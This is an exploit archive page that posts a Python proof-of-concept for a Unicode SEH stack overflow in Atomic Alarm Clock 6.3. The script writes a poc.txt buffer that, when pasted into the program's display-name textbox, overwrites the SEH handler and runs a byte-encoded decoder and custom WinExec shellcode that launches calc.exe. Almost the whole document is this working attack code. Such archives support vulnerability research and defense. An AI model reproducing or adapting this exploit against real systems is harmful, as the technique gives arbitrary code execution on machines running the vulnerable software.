Atomic Alarm Clock 6.3 Stack Overflow

Atomic Alarm Clock 6.3 Stack Overflow: Posted Apr 19, 2020; Authored by Bobby Cooke; Atomic Alarm Clock version 6.3 unicode SEH stack overflow exploit.; tags | exploit, overflow; SHA-256 | 238263daa45c17575706ddcfa1c46f8602cbe4121be203dfefbbee10cd6d9ab1; Download | Favorite | View

Atomic Alarm Clock 6.3 Stack Overflow

# Exploit Title: Atomic Alarm Clock 6.3 - Venetian Blinds Zipper - Unicode SEH Stack Overflow
# Exploit Author: Bobby Cooke
# Date: April 17th, 2020
# Vendor: Drive Software Company
# Vendor Site: http://www.drive-software.com
# Software Download: http://www.drive-software.com/download/ataclock.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: Atomic Alarm Clock 6.3 beta
# Recreate: Install > Open > Run Exploit > Open poc.txt & copy to clipboard > Time Zones > Clock1 > click 'Enter display name' textbox > paste buffer

File    = 'poc.txt'

os_nSEH = '\x41'*(461)
nSEH    = '\xeb\x05'   # jmp short +2
SEH     = '\x47\x47'   # 0x00470047 : pop esi # pop ebx # ret [AtomicAlarmClock.exe] 
#{PAGE_EXECUTE_READ} ASLR: False, Rebase: False, SafeSEH: False 

getPC   = '\x73'   # add [ebx], dh   # nop | [EBX] = writable memory 
getPC  += '\x61'   # popad           # [ESP] = &Payload
getPC  += '\x72'   # add [edx], dh   # realigns execution for 1 byte opcodes

ebx2eax  = '\x58'  # pop eax         # EAX = &Payload
ebx2eax += '\x72'  # add [edx], dh

# Ajust EAX to &Decoder
getDecoder  = '\x05\x13\x11' # add eax, 0x11001300 # EAX + 512-bytes
getDecoder += '\x72'         # add [edx], dh
getDecoder += '\x2D\x11\x11' # sub eax, 0x11001100 # EAX = &Decoder
getDecoder += '\x72'         # add [edx], dh
getDecoder += '\x50'         # push eax            # [ESP] = &Decoder
getDecoder += '\x72'         # add [edx], dh

#DecoderHex  = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3' 
firstHalf   = '\x50\x47\xD2\xC9\xB9\x04\xDB\x42\xDB\x1C\x20\x30\x47\x74\xEB\x50' 
## 2nd byte - \x00 => \x5F
venBlinds   = '\x40\x72\xC6\x5F\x72\x40\x72\x40\x72'         
## 4th byte - \x00 => \x33
venBlinds  += '\xC6\x33\x72\x40\x72\x40\x72'         
## 6th byte - \x00 => \x33
venBlinds  += '\xC6\x33\x72\x40\x72\x40\x72'         
## 8th byte - \x00 => \x66
venBlinds  += '\xC6\x66\x72\x40\x72\x40\x72'         
## 10th byte - \x00 => \x10
venBlinds  += '\xC6\x10\x72\x40\x72\x40\x72'         
## 12th byte - \x00 => \x33
venBlinds  += '\xC6\x33\x72\x40\x72\x40\x72'         
## 14th byte - \x00 => \x42
venBlinds  += '\xC6\x42\x72\x40\x72\x40\x72'         
## 16th byte - \x00 => \x32
venBlinds  += '\xC6\x32\x72\x40\x72\x40\x72'         
## 18th byte - \x00 => \x02
venBlinds  += '\xC6\x02\x72\x40\x72\x40\x72'         
## 20th byte - \x00 => \x10
venBlinds  += '\xC6\x10\x72\x40\x72\x40\x72'         
## 22nd byte - \x00 => \x3F
venBlinds  += '\xC6\x3F\x72\x40\x72\x40\x72'         
## 24nd byte - \x00 => \x1F
venBlinds  += '\xC6\x1F\x72\x40\x72\x40\x72'         
## 26th byte - \x00 => \x49
venBlinds  += '\xC6\x49\x72\x40\x72\x40\x72'         
## 28th byte - \x00 => \x02
venBlinds  += '\xC6\x02\x72\x40\x72\x40\x72'         
## 30th byte - \x00 => \xED
venBlinds  += '\xC6\xED\x72\x40\x72\x40\x72'         
## 32nd byte - \x00 => \xC3
venBlinds  += '\xC6\xC3\x72\x40\x72'         
# Jump to the decoded decoder by Returning to the address we saved on the stack
venBlinds  += '\xC3'         #   ret  [!] Now we are executing the decoder!

os_decoder   = '\x90'*((512/2)-len(nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds))

# Custom PopCalc shellcode that avoids the bad characters
fKernel32  = '\x33\xF6\xF7\xE6\x64\x03\x52\x30\x03\x42\x0C\x03\x70\x1C\xAD\x50\x5E\xAD\xFF\x70\x08'

gExpotTbl  = '\x33\xC9\x33\xF6\x33\xDB\xF7\xE3\x58\x50\x03\x70\x3C\x03\xF0\x03\x56\x78\x03\xD0\x03\x5A\x20\x03\xD8\x03\x4A\x24\x03\xC8\x51\x33\xFF\x03\x7A\x1C\x03\xF8\x57'

fWinExec   = '\x68\x57\x69\x6E\x45\x33\xC0\x33\xF6\x03\xF4\xFC\x50\x33\xC9\x41\x41\x41\x41\xF7\xE1\x33\xFF\x03\x3C\x18\x58\x03\x7C\x24\x0C\xF3\xA6\x74\x03\x40\xEB\xE1\x33\xC9\x41\x41\xF7\xE1\x33\xC9\x03\x4C\x24\x08\x03\xC8\x33\xC0\x66\x03\x01\x33\xC9\x41\x41\x41\x41\xF7\xE1\xFF\x74\x24\x04\x01\x04\x24\x5A\x33\xDB\x03\x1A\x03\x5C\x24\x0C'

# Call WinExec( CmdLine, ShowState );
#   CmdLine   = "calc.exe"
#   ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
callWinExec  = '\x33\xC9\x51\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x33\xC0\x03\xC4\x41\x51\x50\xFF\xD3'

shellcode = fKernel32+gExpotTbl+fWinExec+callWinExec

buffer      = os_nSEH+nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds+os_decoder+firstHalf+shellcode
filler      = '\x77'*(9000-len(buffer))
buffer      = buffer+filler

try:
    payload   = buffer
    f         = open(File, 'w')
    f.write(payload)
    f.close()
    print File + " created successfully"
except:
    print File + ' failed to create'

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Atomic Alarm Clock 6.3 Stack Overflow

Atomic Alarm Clock 6.3 Stack Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Atomic Alarm Clock 6.3 Stack Overflow

Share This

Atomic Alarm Clock 6.3 Stack Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems